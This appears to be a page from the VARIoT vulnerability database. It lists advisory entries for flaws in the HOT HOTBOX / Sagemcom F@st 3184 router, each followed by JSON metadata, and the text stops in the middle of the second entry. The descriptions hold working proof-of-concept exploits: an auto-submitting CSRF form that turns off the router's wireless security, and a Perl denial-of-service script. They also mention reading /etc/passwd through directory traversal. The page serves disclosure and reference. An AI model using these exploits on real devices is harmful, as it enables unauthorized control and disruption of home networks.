Find a vulnerability
Search criteria
18 vulnerabilities by hot
VAR-201312-0132
Vulnerability from variot - Updated: 2025-04-11 22:48The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+
Vulnerabilities List -
Default WPS Pin
Authentication based on IP Address
DoS via crafted POST
Path/Directory Traversal
Script injection via DHCP request
No CSRF Token
Demo - http://www.youtube.com/watch?v=CPlT09ZIj48
CSRF EXPLOIT:
document.getElementById(1).submit();DENIAL OF SERVICE EXPLOIT:
use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;
Author: Oz Elisyan
Date: 3 September 2013
Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);
print "Done.";
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0132",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "hotbox router",
"scope": "eq",
"trust": 3.0,
"vendor": "hot",
"version": "2.1.11"
},
{
"model": "hotbox router",
"scope": "eq",
"trust": 1.0,
"vendor": "hot",
"version": null
},
{
"model": "hotbox router",
"scope": null,
"trust": 0.8,
"vendor": "hot",
"version": null
},
{
"model": "f@st router",
"scope": "eq",
"trust": 0.3,
"vendor": "sagecom",
"version": "31842.1.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:hot:hotbox_router",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "63550"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 0.4
},
"cve": "CVE-2013-5038",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2013-5038",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CNVD-2014-00016",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "VHN-65040",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5038",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-5038",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-00016",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-561",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-65040",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "VULHUB",
"id": "VHN-65040"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The HOT HOTBOX router with software 2.1.11 allows remote attackers to bypass authentication by configuring a source IP address that had previously been used for an authenticated session. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+\n| HOTBOX is the leading router/modem appliance of |\n| HOT Cable communication company in israel. |\n| The Appliance is manufactured by SAGEMCOM |\n| and carries the model name F@st 3184. |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities |\n+--------------------+---------------------------------------------------------+\n| Release Date | 2013/09/09 |\n| Researcher | Oz Elisyan |\n+--------------------+---------------------------------------------------------+\n| System Affected | HOTBOX Router/Modem |\n| Versions Affected | 2.1.11 , possibly earlier |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |\n| CVE-2013-5039 |\n| Vendor Patched | N/A |\n| Classification | 0-day |\n| Exploits | http://elisyan.com/hotboxDoS.pl, |\n| http://elisyan.com/hotboxCSRF.html |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5038"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "VULHUB",
"id": "VHN-65040"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65040",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65040"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5038",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "123901",
"trust": 3.2
},
{
"db": "BID",
"id": "63550",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-561",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00016",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "29518",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65040",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "VULHUB",
"id": "VHN-65040"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"id": "VAR-201312-0132",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "VULHUB",
"id": "VHN-65040"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
}
]
},
"last_update_date": "2025-04-11T22:48:26.906000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.hot.net.il/heb/Main/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65040"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
},
{
"trust": 2.4,
"url": "http://www.youtube.com/watch?v=cplt09zij48"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5038"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5038"
},
{
"trust": 0.3,
"url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/nov/17"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
},
{
"trust": 0.1,
"url": "http://$host/goform/login\";"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxcsrf.html"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxdos.pl,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "VULHUB",
"id": "VHN-65040"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"db": "VULHUB",
"id": "VHN-65040"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65040"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"date": "2013-11-04T13:03:33",
"db": "PACKETSTORM",
"id": "123901"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"date": "2013-12-30T04:53:07.177000",
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00016"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65040"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005732"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-561"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-5038"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HOT HOTBOX Router Vulnerabilities in software that bypass authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005732"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-561"
}
],
"trust": 0.6
}
}
VAR-201312-0375
Vulnerability from variot - Updated: 2025-04-11 22:48Directory traversal vulnerability on the HOT HOTBOX router with software 2.1.11 allows remote attackers to read arbitrary files via a .. (dot dot) in a URI, as demonstrated by a request for /etc/passwd. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. +------------------------------------------------------------------------------+ | HOTBOX is the leading router/modem appliance of | | HOT Cable communication company in israel. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+
Vulnerabilities List -
Default WPS Pin
Authentication based on IP Address
DoS via crafted POST
Path/Directory Traversal
Script injection via DHCP request
No CSRF Token
Demo - http://www.youtube.com/watch?v=CPlT09ZIj48
CSRF EXPLOIT:
document.getElementById(1).submit();DENIAL OF SERVICE EXPLOIT:
use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;
Author: Oz Elisyan
Date: 3 September 2013
Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);
print "Done.";
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0375",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "hotbox router",
"scope": "eq",
"trust": 3.0,
"vendor": "hot",
"version": "2.1.11"
},
{
"model": "hotbox router",
"scope": "eq",
"trust": 1.0,
"vendor": "hot",
"version": null
},
{
"model": "hotbox router",
"scope": null,
"trust": 0.8,
"vendor": "hot",
"version": null
},
{
"model": "f@st router",
"scope": "eq",
"trust": 0.3,
"vendor": "sagecom",
"version": "31842.1.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00019"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-564"
},
{
"db": "NVD",
"id": "CVE-2013-5219"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:hot:hotbox_router",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005735"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "63550"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 0.4
},
"cve": "CVE-2013-5219",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 6.5,
"id": "CVE-2013-5219",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "PARTIAL",
